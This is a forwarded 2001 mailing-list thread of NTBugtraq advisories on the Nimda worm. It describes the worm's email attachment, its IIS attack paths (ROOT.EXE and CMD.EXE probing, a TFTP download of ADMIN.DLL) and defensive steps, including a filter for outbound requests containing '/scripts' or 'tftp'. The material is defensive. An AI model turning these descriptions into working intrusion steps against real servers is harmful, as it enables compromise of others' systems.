Offtopic
>From NTBUGTRAQ:
------------------------
There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the
network.
A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.
One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now thanks!
Analysis is still on-going to determine precisely what the infecting
files do (there are potentially two, ADMIN.DLL and README.EXE).
Some people have said their boxes seem unstable. It could be because
of numerous copies of TFTP.EXE in memory. At this point it might be
best to disconnect any computer that appears unstable from the
network, until such time as sufficient analysis has been performed to
advise how best to bring the box back on-line.
It is also possible for client machines to perform the attacks that
we're seeing, if you have a way to filter outbound HTTP requests you
should look for anything that contains "/scripts" or "tftp" in the
URL and treat as suspicious.
The internal threat by this one is no different (and maybe worse)
than CRII. We've seen indications of WnetEnumResource calls as well
as references to IPC$. There may be NetBIOS share activity associated
with the worm, and if so, it will likely spread rapidly internally.
More than likely you will see the biggest effect in terms of a DoS
(from many source machines). This thing cares not whether you're an
IIS box or not, it tries regardless. As this spreads the effects may
become more severe (no, I'm not going to provide a quote on how
severe). Make sure you're inbound (and preferably your outbound)
router rules are restricted to only those protocols that must be
present, and ideally to machine IP addresses that should have access.
More as it becomes available.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the
visitor.
Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).
While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
--
Regards,
Terrence Koeman
Technical Director/Administrator
MediaMonks B.V. (www.mediamonks.nl)
Please quote all replies in correspondence.
smime.p7s
